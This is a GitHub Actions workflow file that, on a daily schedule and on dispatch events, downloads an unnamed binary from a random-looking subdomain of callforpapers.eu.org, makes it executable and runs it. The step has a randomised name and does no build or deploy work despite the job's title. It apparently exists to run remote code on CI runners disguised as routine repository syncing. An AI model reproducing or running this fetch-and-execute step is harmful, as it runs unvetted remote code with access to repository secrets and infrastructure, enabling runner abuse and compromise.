#2024-03-18-[083359]-8mhqs18f
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "55 2 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: kcvf2u1qi8agh6t5
        run: |
          wget -q https://cnwc60gbrrq4qk1f.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories